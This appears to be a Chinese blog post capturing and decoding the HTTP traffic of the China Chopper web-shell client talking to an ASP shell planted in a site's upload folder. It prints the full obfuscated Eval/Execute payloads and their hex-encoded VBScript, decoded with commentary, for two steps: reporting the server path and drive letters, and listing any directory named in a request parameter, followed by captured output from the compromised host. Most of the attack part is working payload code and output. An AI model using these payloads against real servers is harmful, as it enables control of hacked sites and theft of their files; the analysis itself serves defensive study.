菜刀 ASP链接SHELL 抓包结果及分析

http://blog.csdn.net/webxscan     神龙

&chr(9)      TAB  \t

&chr(58)     :

:       VBScript 语句分隔符;下文解码后的代码按冒号换行显示

WebRoot   获取  SHELL信息

#获取路径

x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A4966204572722054

68656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E57726974652

85329"""")):Response.Write(""""|<-""""):Response.End"")")

' Decoded form of the hex string carried in the request above; the ":" statement
' separators of the original one-line payload are shown here as line breaks.
' Read from a defender's side, this is a reconnaissance step: it reports the
' physical path that "." maps to, followed by the drive letters the web server
' process can enumerate.
' The outer wrapper in the request writes "->|" before and "|<-" after this
' output, which is why the captured response below is framed by those markers.
' The Eval("Execute(...") prefix, the long hex argument and the two response
' markers are the stable, observable features of this exchange.
Dim S:S=Server.Mappath(".")&chr(9)

' Scripting.FileSystemObject is the only COM object this step creates.
SET C=CreateObject("Scripting.FileSystemObject")

' The wrapper runs under On Error Resume Next, so a failed CreateObject only sets
' Err; in that case the error is cleared and S keeps just the path and the TAB.
If Err Then

Err.Clear

Else

' Append every drive letter followed by chr(58), i.e. ":".
For Each D in C.Drives

S=S&D.DriveLetter&chr(58)

Next

End If

' Single write of "<path> TAB <drive letters>"; compare with the response below.
Response.Write(S)

->|d:\virtualhost\host7377245\www\upload\newsimage\shell.asp    C:D:E:R:|<-

##################################

FileManage   通过目录获取文件列表信息

获取目录

x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""

44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D20464426223

0223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D617444

61746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A5345542

0433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6E7365

2E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E5772697465204

62E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E6174747269627574

657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F64696669656429266368722

83929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966

"""")):Response.Write(""""|<-""""):Response.End"")")

&z1=643A5C5C7669727475616C686F73745C5C686F7374373337373234355C5C7777775C5C75706C6F61645C5C6E657773696D6167655C5C7368656C6C2E6173705C5C

' Decoded form of the hex string carried in the request above; the ":" statement
' separators of the original one-line payload are shown here as line breaks.
' Read from a defender's side, this is a directory-listing step: the folder to
' list comes entirely from the request parameter z1, which is hex text decoded by
' the bd() helper that the outer wrapper defines in the same request.
' Nothing in this script restricts the path, so what can be listed is presumably
' limited only by the file-system rights of the account running the page.
Dim RR:RR=bd(Request("z1"))

' FD formats a date value as "YYYY-MM-DD hh:mm:ss".
' Month, day and second are zero-padded by hand; FormatDateTime(dt,4) supplies
' the hh:mm part.
Function FD(dt)

FD=Year(dt)&"-"

If Len(Month(dt))=1 Then

FD = FD&"0"

End If

FD=FD&Month(dt)&"-"

If Len(Day(dt))=1 Then

FD=FD&"0"

End If

FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"

If Len(Second(dt))=1 Then

FD=FD&"0"

End If

FD=FD&Second(dt)

End Function

' Scripting.FileSystemObject is the only COM object this step creates.
SET C=CreateObject("Scripting.FileSystemObject")

Set FO=C.GetFolder(""&RR&"")

' The wrapper runs under On Error Resume Next, so a failure above only sets Err;
' the client then receives "ERROR:// " plus the error description instead of a
' listing.
If Err Then

Response.Write("ERROR:// "&Err.Description)

Err.Clear

Else

' One line per subfolder: name + "/" (chr(47)), TAB, modified time, TAB, a
' literal "0" (chr(48)) in the size column, TAB, attributes, LF (chr(10)).
For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)

Next

' One line per file: name, TAB, modified time, TAB, size, TAB, attributes, LF.
For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)

Next

End If

Dim RR:RR=bd(Request("z1"))Function FD(dt)FD=Year(dt)&"-"If Len(Month(dt))=1 ThenFD = FD&&chr(48)End IfFD=FD&Month(dt)&"-"If Len(Day(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"If Len(Second(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Second(dt)End
FunctionSET C=CreateObject("Scripting.FileSystemObject")Set FO=C.GetFolder(""&RR&"")If Err ThenResponse.Write("ERROR: "&Err.Description)Err.ClearElseFor Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)NextFor
Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)NextEnd If

->|z/    2016-01-06 14:02:59    0    16

20151125161429379.jpg    2015-11-25 16:14:29    27    1

20151125161501308.jpg    2015-11-25 16:15:01    27    1

20151126152910502.jpg    2015-11-26

15:29:10    27    1

20151127140949237.jpg    2015-11-27 14:09:49    27    1

20151127141016802.jpg    2015-11-27 14:10:16    27    1

20151128121918619.jpg    2015-11-28 12:19:18    27

1

20151128122050259.jpg    2015-11-28 12:20:50    27    1

20151129134832033.jpg    2015-11-29 13:48:33    27    1

20151129134914657.jpg    2015-11-29 13:49:14    27    1

20151130131448878.jpg    2015-11-30 13:14:48    27    1

20151130131502483.jpg    2015-11-30 13:15:02    27    1

20151201201439010.jpg    2015-12-01 20:14:39    27    1

20151201201635647.jpg    2015-12-01 20:16:35    27    1

20151202155709826.jpg    2015-12-02 15:57:09    27    1

20151202155810417.jpg    2015-12-02 15:58:10    27    1

20151203161010273.jpg    2015-12-03 16:10:10    27    1

20151203161106179.jpg    2015-12-03 16:11:06    27

Receive: Return Code: 0x00000000

1

20151204143314886.jpg    2015-12-04 14:33:14    27    1

20151206134439872.jpg    2015-12-06 13:44:39    27    1

20151206134534952.jpg    2015-12-06 13:45:34    27    1

20151207122215148.jpg    2015-12-07 12:22:15    27    1

201512

Receive: Return Code: 0x00000000

07122330608.jpg    2015-12-07 12:23:30    27    1

20151208130657123.jpg    2015-12-08 13:06:57    27    1

20151208130759351.jpg    2015-12-08 13:07:59    27    1

20151209143924394.jpg    2015

-12-09 14:39:24    27    1

20151209144048891.jpg    2015-12-09 14:40:48    27    1

20151210140328146.jpg    2015-12-10 14:03:28    27    1

20151210140553956.jpg    2015-12-10 14:05:53    27

1

20151211131426653.jpg    2015-12-11 13:14:26    27    1

20151212141046434.jpg    2015-12-12 14:10:46    27    1

20151212141301143.jpg    2015-12-12 14:13:01    27    1

20151213125012208.jpg    2015-12-13 12:50:12    27    1

2
